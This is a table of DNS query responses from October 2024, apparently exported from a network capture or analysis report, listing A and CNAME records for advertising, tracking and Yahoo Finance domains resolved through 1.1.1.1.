                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.211548090 CEST1.1.1.1192.168.2.40x33f3No error (0)match.prod.bidr.io52.212.12.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.211548090 CEST1.1.1.1192.168.2.40x33f3No error (0)match.prod.bidr.io34.247.205.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.211548090 CEST1.1.1.1192.168.2.40x33f3No error (0)match.prod.bidr.io52.208.7.156A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.211548090 CEST1.1.1.1192.168.2.40x33f3No error (0)match.prod.bidr.io54.154.119.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.213334084 CEST1.1.1.1192.168.2.40x962aNo error (0)pixel-sync.sitescout.com34.36.216.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.214823008 CEST1.1.1.1192.168.2.40xb05aNo error (0)triplelift-match.dotomi.combfp.global.dual.dotomi.weighted.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.215976000 CEST1.1.1.1192.168.2.40x6d63No error (0)um.simpli.fi34.91.62.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.215976000 CEST1.1.1.1192.168.2.40x6d63No error (0)um.simpli.fi35.204.74.118A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.215976000 CEST1.1.1.1192.168.2.40x6d63No error (0)um.simpli.fi35.204.158.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.216465950 CEST1.1.1.1192.168.2.40x12d6No error (0)b1sync.zemanta.comb1-use1.zemanta.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.216465950 CEST1.1.1.1192.168.2.40x12d6No error (0)b1-use1.zemanta.comzemanta-nychi2.outbrain.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.216465950 CEST1.1.1.1192.168.2.40x12d6No error (0)zemanta-nychi2.outbrain.orgchidc2.outbrain.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.216465950 CEST1.1.1.1192.168.2.40x12d6No error (0)chidc2.outbrain.org50.31.142.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.217452049 CEST1.1.1.1192.168.2.40x5a45No error (0)b1sync.zemanta.comb1-use1.zemanta.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.217452049 CEST1.1.1.1192.168.2.40x5a45No error (0)b1-use1.zemanta.comzemanta-nychi2.outbrain.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.217452049 CEST1.1.1.1192.168.2.40x5a45No error (0)zemanta-nychi2.outbrain.orgchidc2.outbrain.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.223076105 CEST1.1.1.1192.168.2.40x5b08No error (0)triplelift-match.dotomi.combfp.global.dual.dotomi.weighted.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.228416920 CEST1.1.1.1192.168.2.40xffacNo error (0)sync.go.sonobi.comiad-2-sync.go.sonobi.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.228416920 CEST1.1.1.1192.168.2.40xffacNo error (0)iad-2-sync.go.sonobi.com69.166.1.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.228416920 CEST1.1.1.1192.168.2.40xffacNo error (0)iad-2-sync.go.sonobi.com69.166.1.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.228416920 CEST1.1.1.1192.168.2.40xffacNo error (0)iad-2-sync.go.sonobi.com69.166.1.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.228416920 CEST1.1.1.1192.168.2.40xffacNo error (0)iad-2-sync.go.sonobi.com69.166.1.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.229788065 CEST1.1.1.1192.168.2.40x8e10No error (0)medianet-match.dotomi.combfp.global.dual.dotomi.weighted.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.229942083 CEST1.1.1.1192.168.2.40x61efNo error (0)sync.go.sonobi.comiad-2-sync.go.sonobi.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.230190039 CEST1.1.1.1192.168.2.40x4fc1No error (0)us-u.openx.net34.98.64.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.230190039 CEST1.1.1.1192.168.2.40x4fc1No error (0)us-u.openx.net35.244.159.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.232208014 CEST1.1.1.1192.168.2.40xb24fNo error (0)pm.w55c.netcdn.w55c.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.232208014 CEST1.1.1.1192.168.2.40xb24fNo error (0)cdn.w55c.net3.72.171.191A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.232208014 CEST1.1.1.1192.168.2.40xb24fNo error (0)cdn.w55c.net18.159.179.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.232208014 CEST1.1.1.1192.168.2.40xb24fNo error (0)cdn.w55c.net3.69.4.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.232208014 CEST1.1.1.1192.168.2.40xb24fNo error (0)cdn.w55c.net3.67.66.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.233891964 CEST1.1.1.1192.168.2.40x9fa5No error (0)pm.w55c.netcdn.w55c.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.237437010 CEST1.1.1.1192.168.2.40x2abbNo error (0)medianet-match.dotomi.combfp.global.dual.dotomi.weighted.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.392921925 CEST1.1.1.1192.168.2.40x5d53No error (0)sync.srv.stackadapt.com52.86.42.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.392921925 CEST1.1.1.1192.168.2.40x5d53No error (0)sync.srv.stackadapt.com54.209.243.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.392921925 CEST1.1.1.1192.168.2.40x5d53No error (0)sync.srv.stackadapt.com54.163.230.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.392921925 CEST1.1.1.1192.168.2.40x5d53No error (0)sync.srv.stackadapt.com54.158.94.71A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.392921925 CEST1.1.1.1192.168.2.40x5d53No error (0)sync.srv.stackadapt.com52.7.204.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.392921925 CEST1.1.1.1192.168.2.40x5d53No error (0)sync.srv.stackadapt.com54.174.240.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.392921925 CEST1.1.1.1192.168.2.40x5d53No error (0)sync.srv.stackadapt.com54.157.243.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.392921925 CEST1.1.1.1192.168.2.40x5d53No error (0)sync.srv.stackadapt.com54.147.49.208A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.396189928 CEST1.1.1.1192.168.2.40x6659No error (0)pr-bh.ybp.yahoo.comds-pr-bh.ybp.gysm.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.396189928 CEST1.1.1.1192.168.2.40x6659No error (0)ds-pr-bh.ybp.gysm.yahoodns.net63.32.70.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.396189928 CEST1.1.1.1192.168.2.40x6659No error (0)ds-pr-bh.ybp.gysm.yahoodns.net54.77.193.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.396189928 CEST1.1.1.1192.168.2.40x6659No error (0)ds-pr-bh.ybp.gysm.yahoodns.net108.129.11.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.396189928 CEST1.1.1.1192.168.2.40x6659No error (0)ds-pr-bh.ybp.gysm.yahoodns.net52.215.59.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.397392035 CEST1.1.1.1192.168.2.40x195No error (0)cm.adform.nettrack-eu.adformnet.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.397403002 CEST1.1.1.1192.168.2.40x1ab4No error (0)cm.g.doubleclick.net142.250.185.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.397412062 CEST1.1.1.1192.168.2.40x54e6No error (0)pr-bh.ybp.yahoo.comds-pr-bh.ybp.gysm.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.397485971 CEST1.1.1.1192.168.2.40x878bNo error (0)cm.adform.nettrack-eu.adformnet.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.397886038 CEST1.1.1.1192.168.2.40xa60bNo error (0)gum.criteo.comgum.nl3.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.397907019 CEST1.1.1.1192.168.2.40x9c3aNo error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.398075104 CEST1.1.1.1192.168.2.40x153eNo error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.398340940 CEST1.1.1.1192.168.2.40x95b4No error (0)gum.criteo.comgum.nl3.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.398340940 CEST1.1.1.1192.168.2.40x95b4No error (0)gum.nl3.vip.prod.criteo.com178.250.1.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.399765968 CEST1.1.1.1192.168.2.40xf101No error (0)eus.rubiconproject.comeus.rubiconproject.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.399873972 CEST1.1.1.1192.168.2.40xb4b4No error (0)eus.rubiconproject.comeus.rubiconproject.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:29.920314074 CEST1.1.1.1192.168.2.40x338eNo error (0)hbx.media.net23.212.88.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.179287910 CEST1.1.1.1192.168.2.40xc512No error (0)ad.turn.compresentation-ams1.turn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.179287910 CEST1.1.1.1192.168.2.40xc512No error (0)presentation-ams1.turn.com46.228.164.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.180131912 CEST1.1.1.1192.168.2.40xf94aNo error (0)ad.turn.compresentation-ams1.turn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.369142056 CEST1.1.1.1192.168.2.40x1b02No error (0)cs.media.net23.212.88.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.387243986 CEST1.1.1.1192.168.2.40x1215No error (0)streamer.finance.yahoo.comstreamer.finance-aws-prod.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.387243986 CEST1.1.1.1192.168.2.40x1215No error (0)streamer.finance-aws-prod.aws.oath.cloudstreamer-us-east-1.finance-aws-prod.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.387243986 CEST1.1.1.1192.168.2.40x1215No error (0)streamer-us-east-1.finance-aws-prod.aws.oath.cloudprod-alb-streamer-1804719662.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.394232988 CEST1.1.1.1192.168.2.40x4a72No error (0)streamer.finance.yahoo.comstreamer.finance-aws-prod.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.394232988 CEST1.1.1.1192.168.2.40x4a72No error (0)streamer.finance-aws-prod.aws.oath.cloudstreamer-us-east-1.finance-aws-prod.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.394232988 CEST1.1.1.1192.168.2.40x4a72No error (0)streamer-us-east-1.finance-aws-prod.aws.oath.cloudprod-alb-streamer-1804719662.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.394232988 CEST1.1.1.1192.168.2.40x4a72No error (0)prod-alb-streamer-1804719662.us-east-1.elb.amazonaws.com52.86.103.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.394232988 CEST1.1.1.1192.168.2.40x4a72No error (0)prod-alb-streamer-1804719662.us-east-1.elb.amazonaws.com54.209.120.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.394232988 CEST1.1.1.1192.168.2.40x4a72No error (0)prod-alb-streamer-1804719662.us-east-1.elb.amazonaws.com23.21.237.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.394232988 CEST1.1.1.1192.168.2.40x4a72No error (0)prod-alb-streamer-1804719662.us-east-1.elb.amazonaws.com54.84.140.231A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.394232988 CEST1.1.1.1192.168.2.40x4a72No error (0)prod-alb-streamer-1804719662.us-east-1.elb.amazonaws.com3.225.13.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.394232988 CEST1.1.1.1192.168.2.40x4a72No error (0)prod-alb-streamer-1804719662.us-east-1.elb.amazonaws.com3.232.155.250A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.394232988 CEST1.1.1.1192.168.2.40x4a72No error (0)prod-alb-streamer-1804719662.us-east-1.elb.amazonaws.com54.172.110.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.394232988 CEST1.1.1.1192.168.2.40x4a72No error (0)prod-alb-streamer-1804719662.us-east-1.elb.amazonaws.com34.202.27.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.435570955 CEST1.1.1.1192.168.2.40x8338No error (0)u.openx.net34.98.64.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.435570955 CEST1.1.1.1192.168.2.40x8338No error (0)u.openx.net35.244.159.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.553445101 CEST1.1.1.1192.168.2.40x6404No error (0)sync.a-mo.netnld-prebid.a-mx.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.553445101 CEST1.1.1.1192.168.2.40x6404No error (0)nld-prebid.a-mx.net163.5.194.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.553445101 CEST1.1.1.1192.168.2.40x6404No error (0)nld-prebid.a-mx.net163.5.194.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.553445101 CEST1.1.1.1192.168.2.40x6404No error (0)nld-prebid.a-mx.net163.5.194.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.553445101 CEST1.1.1.1192.168.2.40x6404No error (0)nld-prebid.a-mx.net163.5.194.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.553445101 CEST1.1.1.1192.168.2.40x6404No error (0)nld-prebid.a-mx.net163.5.194.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.553445101 CEST1.1.1.1192.168.2.40x6404No error (0)nld-prebid.a-mx.net163.5.194.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.553445101 CEST1.1.1.1192.168.2.40x6404No error (0)nld-prebid.a-mx.net163.5.194.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.553445101 CEST1.1.1.1192.168.2.40x6404No error (0)nld-prebid.a-mx.net163.5.194.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.555201054 CEST1.1.1.1192.168.2.40xf797No error (0)sync.a-mo.netnld-prebid.a-mx.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.704711914 CEST1.1.1.1192.168.2.40x8f23No error (0)widget.us.criteo.comwidget.us5.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.704711914 CEST1.1.1.1192.168.2.40x8f23No error (0)widget.us5.vip.prod.criteo.com74.119.117.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.706351995 CEST1.1.1.1192.168.2.40x770cNo error (0)widget.us.criteo.comwidget.us5.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.747237921 CEST1.1.1.1192.168.2.40x983eNo error (0)token.rubiconproject.compixel.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.747275114 CEST1.1.1.1192.168.2.40xdb9cNo error (0)token.rubiconproject.compixel.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.762804985 CEST1.1.1.1192.168.2.40x1fceNo error (0)sync.crwdcntrl.net54.76.113.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.762804985 CEST1.1.1.1192.168.2.40x1fceNo error (0)sync.crwdcntrl.net52.214.114.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.762804985 CEST1.1.1.1192.168.2.40x1fceNo error (0)sync.crwdcntrl.net63.32.25.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.762804985 CEST1.1.1.1192.168.2.40x1fceNo error (0)sync.crwdcntrl.net99.80.212.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.762804985 CEST1.1.1.1192.168.2.40x1fceNo error (0)sync.crwdcntrl.net54.229.139.118A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.762804985 CEST1.1.1.1192.168.2.40x1fceNo error (0)sync.crwdcntrl.net52.30.186.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.762804985 CEST1.1.1.1192.168.2.40x1fceNo error (0)sync.crwdcntrl.net54.72.167.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:30.762804985 CEST1.1.1.1192.168.2.40x1fceNo error (0)sync.crwdcntrl.net52.48.114.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:31.349864960 CEST1.1.1.1192.168.2.40x6d2No error (0)rtb.mfadsrvr.compool.dorpat.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:31.349864960 CEST1.1.1.1192.168.2.40x6d2No error (0)pool.dorpat.iponweb.netdorpat.geo.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:31.349864960 CEST1.1.1.1192.168.2.40x6d2No error (0)dorpat.geo.iponweb.net35.214.199.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:31.349879980 CEST1.1.1.1192.168.2.40xf91dNo error (0)rtb.mfadsrvr.compool.dorpat.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:31.349879980 CEST1.1.1.1192.168.2.40xf91dNo error (0)pool.dorpat.iponweb.netdorpat.geo.iponweb.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:31.863925934 CEST1.1.1.1192.168.2.40xb1c7No error (0)sync-tm.everesttech.netsync.tubemogul.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:31.863925934 CEST1.1.1.1192.168.2.40xb1c7No error (0)sync.tubemogul.comsyncf.tubemogul.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:31.863925934 CEST1.1.1.1192.168.2.40xb1c7No error (0)syncf.tubemogul.comh2.shared.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:31.864483118 CEST1.1.1.1192.168.2.40xb68eNo error (0)sync-tm.everesttech.netsync.tubemogul.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:31.864483118 CEST1.1.1.1192.168.2.40xb68eNo error (0)sync.tubemogul.comsyncf.tubemogul.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:31.864483118 CEST1.1.1.1192.168.2.40xb68eNo error (0)syncf.tubemogul.comh2.shared.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:32.291757107 CEST1.1.1.1192.168.2.40x2cbNo error (0)image2.pubmatic.comimage2v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:32.291757107 CEST1.1.1.1192.168.2.40x2cbNo error (0)image2v2.pubmnet.compug-ams-bc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:32.292494059 CEST1.1.1.1192.168.2.40xefcNo error (0)image2.pubmatic.comimage2v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:32.292494059 CEST1.1.1.1192.168.2.40xefcNo error (0)image2v2.pubmnet.compug-lhr-bc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:32.292494059 CEST1.1.1.1192.168.2.40xefcNo error (0)pug-lhr-bc.pubmnet.com185.64.191.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:32.296403885 CEST1.1.1.1192.168.2.40xea96No error (0)id.rtb.mxid.a-mx.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:32.297158957 CEST1.1.1.1192.168.2.40xbe18No error (0)id.rtb.mxid.a-mx.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:32.297158957 CEST1.1.1.1192.168.2.40xbe18No error (0)id.a-mx.com79.127.216.47A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:32.297158957 CEST1.1.1.1192.168.2.40xbe18No error (0)id.a-mx.com79.127.227.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:32.306050062 CEST1.1.1.1192.168.2.40x895fNo error (0)prebid.adnxs.comxandr-prebid.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:32.308233023 CEST1.1.1.1192.168.2.40x777No error (0)ow.pubmatic.comowv2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:32.308233023 CEST1.1.1.1192.168.2.40x777No error (0)owv2.pubmnet.comow-amsc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:32.308233023 CEST1.1.1.1192.168.2.40x777No error (0)ow-amsc.pubmnet.com185.64.189.116A (IP address)IN (0x0001)false
